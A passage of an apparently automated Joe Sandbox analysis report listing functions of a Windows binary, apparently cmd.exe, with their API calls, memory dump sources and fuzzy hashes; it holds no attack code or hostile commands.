                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 850181435-0
                                                                                                          • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                                          • Instruction ID: fe6f39f10bffbf92e9c3220f9a73ce9aa3ff24c0dc43868dc1c0cdf2c749e803
                                                                                                          • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                                          • Instruction Fuzzy Hash: 4841C532609BC1C9E7719F24E8842EDBBA4FB89B48F864135DA4D47B64DF38D549C710
                                                                                                          Function 00007FF7AB134A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1224 7ff7ab134a14-7ff7ab134a3e GetEnvironmentStringsW 1225 7ff7ab134aae-7ff7ab134ac5 1224->1225 1226 7ff7ab134a40-7ff7ab134a46 1224->1226 1227 7ff7ab134a59-7ff7ab134a8f GetProcessHeap HeapAlloc 1226->1227 1228 7ff7ab134a48-7ff7ab134a52 1226->1228 1230 7ff7ab134a91-7ff7ab134a9a memmove 1227->1230 1231 7ff7ab134a9f-7ff7ab134aa9 FreeEnvironmentStringsW 1227->1231 1228->1228 1229 7ff7ab134a54-7ff7ab134a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1225
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1623332820-0
                                                                                                          • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                          • Instruction ID: a9e80c28694a10f746b747df537636d32ba4124b05e65f17cfc8b87a08f56500
                                                                                                          • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                          • Instruction Fuzzy Hash: 80119425B1674182DE56AB0AF404039FBA0FB89F84B9A9134DE4F03774EF3DE4458750
                                                                                                          Function 00007FF7AB135CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1826527819-0
                                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                          • Instruction ID: 019e4a36202a8892074c6ec3ecea2e5bb6af1097df60689b23b877a28beb2d09
                                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                          • Instruction Fuzzy Hash: E9015B7190A682CAE6067B1DF4841B9FA60FB8A759FC66230D54F033B5EF3C90488720
                                                                                                          Function 00007FF7AB133060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7AB1292AC), ref: 00007FF7AB1330CA
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB1330DD
                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB1330F6
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB133106
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1464828906-0
                                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                          • Instruction ID: 2d89adc9bfdb4b0abdb3cf7c1660ad7a02dc9fa31274631fe27a3d7e2a5deeef
                                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                          • Instruction Fuzzy Hash: 66312B22A0970582E6AAAF0DF04047DF660FB45B98FC69134DA4A433F0EF7DA8494320
                                                                                                          Function 00007FF7AB12CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                          • Instruction ID: bf5751da2718d7e857140ec16c1f09f89e8cdd1b72c775048c7e9d6835c9b827
                                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                          • Instruction Fuzzy Hash: 2311CA61A0A74281EB55EB1DF1442B9A2509F84BACF954331DE6D473F5FE2CD4454320
                                                                                                          Function 00007FF7AB12BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcschr
                                                                                                          • String ID: 2$COMSPEC
                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction ID: 871d66ac56159339634f83c76faac090e6017405a0ab398c94d5d4044214133e
                                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction Fuzzy Hash: 9751A122A0A643C5FB67BB2DF49137AE2919F44B8CF864031DA4D426F5DE2DE8448761
                                                                                                          Function 00007FF7AB132EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 4254246844-0
                                                                                                          • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                          • Instruction ID: 291bbef25b171a2b2314424986f407d6e6549684f87f32eee2636b889729811f
                                                                                                          • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                          • Instruction Fuzzy Hash: 3E419621A0A74286EE96AB08F444379F790FF49788F865531D95D477B0FF3CE4498760
                                                                                                          Function 00007FF7AB135A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 1591002910-0
                                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                          • Instruction ID: 605d5d8ec0567993b985d8a43f9688b2f13509dd5c5ea4feab659799e5701994
                                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                          • Instruction Fuzzy Hash: DAF06734A4B602CBE706AB18F895179BBA0FB8D719B865235C90A43334DE3DA4158B11
                                                                                                          Function 00007FF7AB13291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DriveType
                                                                                                          • String ID: :
                                                                                                          • API String ID: 338552980-336475711
                                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                          • Instruction ID: 28bf559c3646b83636a164d3a6a04605856f8dc573197f1e0a7878da6b68c91a
                                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                          • Instruction Fuzzy Hash: 81E0E56661860087D7209B58F09106AF760FB8C308FC51624D98D83734DB3CC249CB18
                                                                                                          Function 00007FF7AB135AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF7AB135B52
                                                                                                            • Part of subcall function 00007FF7AB134224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134297
                                                                                                            • Part of subcall function 00007FF7AB134224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1342D7
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB1342FD
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB134368
                                                                                                            • Part of subcall function 00007FF7AB134224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134380
                                                                                                            • Part of subcall function 00007FF7AB134224: wcsrchr.MSVCRT ref: 00007FF7AB1343E6
                                                                                                            • Part of subcall function 00007FF7AB134224: lstrcmpW.KERNELBASE ref: 00007FF7AB134401
                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7AB135BC7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 497088868-0
                                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                          • Instruction ID: 93e1d054896898dcc63ab178fdf82fb0f1fe47c4e10f67c43ae1a2d17e8469d0
                                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                          • Instruction Fuzzy Hash: B631B630A0E64286FA69B719F49417DE295FF89B8CF865031D94E47BB5EF3CE4058710
                                                                                                          Function 00007FF7AB133A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindClose.KERNELBASE(?,?,?,00007FF7AB14EAC5,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB133A56
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseFind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1863332320-0
                                                                                                          • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                          • Instruction ID: da46d8b68aa3bde4d592886268386e888e2df2e60116a37c2a8baacc06d6b703
                                                                                                          • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                          • Instruction Fuzzy Hash: A101D630E0A643C5E69AA71DF450039F6A1FF88B48BD6A530D50EC32B4EF2CE5868324
                                                                                                          Function 00007FF7AB139A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1412018758-0
                                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                          • Instruction ID: 07e695a87ec2638c0a7469e996b99b8eb7c6cb83922186750ba6f307d45bdb64
                                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                          • Instruction Fuzzy Hash: 6FE06541F1B24B81FE5E376AF881178A2505F18789FC91430CD0E053B2FD2CA1998330
                                                                                                          Function 00007FF7AB12CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                          • Instruction ID: c1882c4700a1322671b282f50fe12c5dde7c16e2fbdf4df465b8c7255d198c96
                                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                          • Instruction Fuzzy Hash: D5F03131A1A742C6EB56AB19F840078FBA5FB89B48B9A9534D90E03374DF3CD446C720
                                                                                                          Function 00007FF7AB134C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                          Download Yara Rule
